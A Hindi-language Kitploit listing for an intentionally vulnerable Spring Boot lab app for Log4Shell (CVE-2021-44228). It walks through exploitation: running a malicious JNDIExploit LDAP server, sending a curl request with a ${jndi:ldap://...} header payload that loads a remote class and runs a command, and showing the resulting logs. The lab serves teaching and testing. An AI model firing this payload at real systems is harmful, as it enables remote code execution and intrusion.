Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4shell-vulnerable-app — Spring Boot वेब एप्लिकेशन जो Log4Shell (CVE-2021-44228) के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/christophetd/log4shell-vulnerable-app
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubchristophetd/log4shell-vulnerable-app

log4shell-vulnerable-app

Spring Boot वेब एप्लिकेशन जो Log4Shell (CVE-2021-44228) के लिए संवेदनशील है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1.1k5523 साल पहलेKitploit द्वारा समीक्षित

Log4Shell नमूना असुरक्षित अनुप्रयोग (CVE-2021-44228)

इस रिपॉजिटरी में CVE-2021-44228 से असुरक्षित एक Spring Boot वेब अनुप्रयोग है, जिसे Log4Shell नाम दिया गया है।

यह Log4j 2.14.1 ( spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है।

अनुप्रयोग चलाना

इसे चलाएँ:

root@kitploit:~
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

शोषण के चरण

नोट: यह मूल LunaSec सलाह से अत्यधिक प्रेरित है। अपने जोखिम पर चलाएँ, अधिमानतः सैंडबॉक्स वातावरण में VM में।

अपडेट (13 दिसंबर): JNDIExploit रिपॉजिटरी को GitHub से हटा दिया गया है (संभवतः, GitHub द्वारा नहीं)... यहाँ क्लिक करें Wayback Machine द्वारा कैश किए गए संस्करण को डाउनलोड करने के लिए।

  • एक दुर्भावनापूर्ण LDAP सर्वर चालू करने के लिए JNDIExploit का उपयोग करें
root@kitploit:~
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
  • फिर, इसका उपयोग करके शोषण ट्रिगर करें:
root@kitploit:~
# 'touch /tmp/pwned' निष्पादित करेगा
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
  • JNDIExploit के आउटपुट पर ध्यान दें, जो दर्शाता है कि इसने एक दुर्भावनापूर्ण LDAP प्रतिक्रिया भेजी और दूसरे चरण का पेलोड प्रस्तुत किया:
root@kitploit:~
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119  /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
  • यह पुष्टि करने के लिए कि कोड निष्पादन सफल रहा, ध्यान दें कि असुरक्षित अनुप्रयोग चलाने वाले कंटेनर में फ़ाइल /tmp/pwned.txt बनाई गई थी:
root@kitploit:~
$ docker exec vulnerable-app ls /tmp
...
pwned
...

संदर्भ

https://www.lunasec.io/docs/blog/log4j-zero-day/ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

योगदानकर्ता

@christophetd @rayhan0x01

टूल डाउनलोड करें